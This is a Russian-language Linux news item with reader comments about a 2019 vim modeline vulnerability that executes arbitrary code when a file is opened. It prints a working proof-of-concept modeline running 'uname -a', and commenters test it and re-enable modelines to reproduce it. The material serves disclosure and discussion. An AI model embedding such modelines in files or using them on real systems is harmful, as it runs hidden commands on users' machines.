Уязвимость в vim

1

1

Опубликована уязвимость в текстовом редакторе vim, позволяющая исполнить произвольный код при открытии редактором текстового файла.

Вот текст файла выполняющего безобидный uname -a

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Исправление в виде добавленного вызова check_secure() уже доступно в репозиториях vim и neovim.

>>> Очень хорошее описание механизма уязвимости

Ссылка

←	LibreOffice прекращает поддержку 32bit для Linux

10-11 июня в Москве пройдет шестая научно-практическая конференция OS DAY

→

Показаны ответы на комментарий. Показать все комментарии.

Ответ на: комментарий от otto 06.06.2019 11:36:48 +00:00

Речь шла о том, что MrClon запускал $vi, что эквивалентно запуску $vim. В новости тоже говорится про vim.

Да у него уже пропатчено.
А vim когда запускается через vi то и работает как vi, а не как vim. /bin/sh тоже указывает на bash, но попробуй юзеру поставить шеллами sh и bash и увидишь разницу. Или в скрипте с башизмами поставь #!/bin/sh. Хотя это уже к делу не относится.

imul ★★★★★
(06.06.2019 12:06:05 +00:00)

Ответ на: комментарий от imul 06.06.2019 12:06:05 +00:00

Да у него уже пропатчено.

Я давненько не обновлялся. С 21 мая как минимум. Да и тогда вроде vim не обновлялся (но это не точно). Подозреваю что дело вот в этом:

~$ readlink /etc/alternatives/vim

/usr/bin/vim.basic

MrClon ★★★★★
(06.06.2019 12:11:21 +00:00)

Ответ на: комментарий от MrClon 06.06.2019 12:11:21 +00:00

Модлайны включены?

otto ★★★★
(06.06.2019 12:13:21 +00:00)

Ответ на: комментарий от MrClon 06.06.2019 12:11:21 +00:00

Подозреваю что дело вот в этом:
/usr/bin/vim.basic

Может быть. Мне проверить не на чем.

imul ★★★★★
(06.06.2019 12:17:36 +00:00)

Ссылка

Ответ на: комментарий от otto 06.06.2019 12:13:21 +00:00

ХЗ, я вимом пользуюсь в режиме блондинки, настройки почти не трогаю. Смотри выше выхлопы vi(m) --version на пастабинах

MrClon ★★★★★
(06.06.2019 12:17:39 +00:00)

Ответ на: комментарий от MrClon 06.06.2019 12:17:39 +00:00

Посмотри в vimrc, может стоять nomodeline по дефолту. Пропиши

set modeline
set modelines=1

otto ★★★★
(06.06.2019 12:24:29 +00:00)
Последнее исправление: otto 06.06.2019 12:24:41 +00:00 (всего исправлений: 1)

Ответ на: комментарий от otto 06.06.2019 12:24:29 +00:00

Да, так работает. Хотя вхождений modeline в /etc/vim и ~/.vim не было, похоже nomodeline это вкомпиленый дефолт.

Дожили блин, коллективными усилиями чиним неработающую уязвимость (:

MrClon ★★★★★
(06.06.2019 12:30:38 +00:00)

Ответ на: комментарий от MrClon 06.06.2019 12:30:38 +00:00

вкомпиленый дефолт

Самое забавное, что отключают именно по соображениям безопасности )

otto ★★★★
(06.06.2019 12:43:54 +00:00)

Ответ на: комментарий от otto 06.06.2019 12:43:54 +00:00

nomodeline отключают? Т.е. включают modeline?

MrClon ★★★★★
(06.06.2019 12:55:04 +00:00)

Ответ на: комментарий от MrClon 06.06.2019 12:55:04 +00:00

Наоборот.

otto ★★★★
(06.06.2019 12:56:08 +00:00)

Ответ на: комментарий от otto 06.06.2019 12:56:08 +00:00

Тогда в каком месте смеяться? Небезопасную фичу можно отключить вручную опцией, и в некоторых сборках эта опция — вкомпиленый дефолт. Вроде всё логично

MrClon ★★★★★
(06.06.2019 13:00:00 +00:00)

Ответ на: комментарий от MrClon 06.06.2019 13:00:00 +00:00

Ну ты же сказал, что чиним нерабочую уязвимость путем отключения дефолтных безопасных настроек.

otto ★★★★
(06.06.2019 13:07:00 +00:00)

Ссылка

Ответ на: комментарий от imul 06.06.2019 12:06:05 +00:00

Проверил у себя:

$ vim test.txt 

Linux otto 5.1.6-gentoo #1 SMP Mon Jun 3 19:48:55 MSK 2019 x86_64 Intel(R) Core(TM) i5-4670 CPU @ 3.40GHz GenuineIntel GNU/Linux

Нажмите ENTER или введите команду для продолжения
$ vi test.txt 

Linux otto 5.1.6-gentoo #1 SMP Mon Jun 3 19:48:55 MSK 2019 x86_64 Intel(R) Core(TM) i5-4670 CPU @ 3.40GHz GenuineIntel GNU/Linux

Нажмите ENTER или введите команду для продолжения

Если режимы vi и vim отличаются, то в данном случае это играет никакой роли.

otto ★★★★
(06.06.2019 16:08:34 +00:00)

Ссылка

Ответ на: комментарий от MrClon 06.06.2019 12:11:21 +00:00

а в tiny это должно работать?

mumpster ★★★★★
(07.06.2019 16:06:05 +00:00)

Ответ на: комментарий от mumpster 07.06.2019 16:06:05 +00:00

ХЗ, проверь. Добавь в конфиг это и проверь

MrClon ★★★★★
(07.06.2019 18:32:46 +00:00)

Ответ на: комментарий от MrClon 06.06.2019 12:30:38 +00:00

аха, я помню, как достижение рассказывали, что в Wine наонкец-то заработали некоторые вендовирусы ;-)

mumpster ★★★★★
(08.06.2019 15:31:18 +00:00)

Ответ на: комментарий от MrClon 07.06.2019 18:32:46 +00:00

хз в общем, у меня tiny стоит, может в этом дело:

#vim.tiny -u .vimrc SW/vim.bug тупо открывает тот шаблон как текст

mumpster ★★★★★
(08.06.2019 15:36:47 +00:00)
Последнее исправление: mumpster 08.06.2019 15:37:41 +00:00 (всего исправлений: 3)

Ссылка

Ответ на: комментарий от mumpster 08.06.2019 15:31:18 +00:00

Wine позволял запускать Klez в 2002-м году ;-)

Aceler ★★★★★
(08.06.2019 16:02:58 +00:00)

Ответ на: комментарий от Aceler 08.06.2019 16:02:58 +00:00

хз, я сильно этим вопросом не интересовался, тем более что не помню, что такое было это «klez». но вот что большая часть вирья тупо обламывалось на вайне - это я помню.

mumpster ★★★★★
(09.06.2019 17:11:57 +00:00)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	LibreOffice прекращает поддержку 32bit для Linux

Безопасность

10-11 июня в Москве пройдет шестая научно-практическая конференция OS DAY

→

Похожие темы